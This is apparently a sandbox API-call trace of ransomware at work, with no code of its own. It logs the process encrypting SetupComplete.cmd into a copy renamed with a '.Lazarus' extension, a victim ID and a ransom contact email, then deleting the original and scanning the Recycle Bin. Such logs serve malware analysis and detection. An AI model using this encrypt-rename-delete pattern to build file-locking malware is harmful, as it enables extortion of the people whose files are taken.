[0060.576] AreFileApisANSI () returned 1 [0060.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.576] GetLastError () returned 0x0 [0060.576] SetLastError (dwErrCode=0x0) [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e148 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0060.576] GetLastError () returned 0x0 [0060.576] SetLastError (dwErrCode=0x0) [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0060.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.577] AreFileApisANSI () returned 1 [0060.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0060.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x73428 [0060.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x73428, cchWideChar=102 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0060.577] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.577] GetFileType (hFile=0x424) returned 0x1 [0060.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73428 | out: hHeap=0x20000) returned 1 [0060.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.577] AreFileApisANSI () returned 1 [0060.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0060.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.578] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.578] GetFileType (hFile=0x410) returned 0x1 [0060.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.578] GetLastError () returned 0x0 [0060.578] SetLastError (dwErrCode=0x0) [0060.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.578] GetLastError () returned 0x0 [0060.578] SetLastError (dwErrCode=0x0) [0060.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0060.578] ReadFile (in: hFile=0x410, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f030*=0x133, lpOverlapped=0x0) returned 1 [0060.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.699] ReadFile (in: hFile=0x410, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0060.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.699] GetLastError () returned 0x0 [0060.699] SetLastError (dwErrCode=0x0) [0060.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3) returned 0x7cfa0 [0060.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0060.699] GetLastError () returned 0x0 [0060.699] SetLastError (dwErrCode=0x0) [0060.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0060.699] WriteFile (in: hFile=0x424, lpBuffer=0x8a210*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesWritten=0x327ef70*=0x140, lpOverlapped=0x0) returned 1 [0060.700] GetLastError () returned 0x0 [0060.700] SetLastError (dwErrCode=0x0) [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.700] GetLastError () returned 0x0 [0060.700] SetLastError (dwErrCode=0x0) [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0060.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.700] CloseHandle (hObject=0x424) returned 1 [0060.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.701] CloseHandle (hObject=0x410) returned 1 [0060.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.702] AreFileApisANSI () returned 1 [0060.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0060.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.702] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.703] GetFileType (hFile=0x410) returned 0x1 [0060.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0060.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0060.703] GetLastError () returned 0xb7 [0060.703] SetLastError (dwErrCode=0xb7) [0060.703] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0060.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.704] CloseHandle (hObject=0x410) returned 1 [0060.704] AreFileApisANSI () returned 1 [0060.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0060.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x6cce8, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.704] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.706] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x38, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x20320, ftLastWriteTime.dwLowDateTime=0x1, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x23, dwReserved1=0x0, cFileName="8", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧襐\x07̧비聐蘰\x08賂̧")) returned 0 [0060.706] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0060.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0060.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0060.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77260 | out: hHeap=0x20000) returned 1 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.707] AreFileApisANSI () returned 1 [0060.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 16 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.707] AreFileApisANSI () returned 1 [0060.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0060.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88630, cchWideChar=16 | out: lpWideCharStr="C:\\$Recycle.Bin") returned 16 [0060.707] CreateFileW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.707] GetLastError () returned 0x5 [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.708] AreFileApisANSI () returned 1 [0060.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0060.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88518, cchWideChar=16 | out: lpWideCharStr="C:\\$Recycle.Bin") returned 16 [0060.708] CreateFileW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.708] GetLastError () returned 0x5 [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] GetLastError () returned 0x5 [0060.708] SetLastError (dwErrCode=0x5) [0060.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.709] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f648 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.709] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78f10 [0060.709] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.709] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x16, 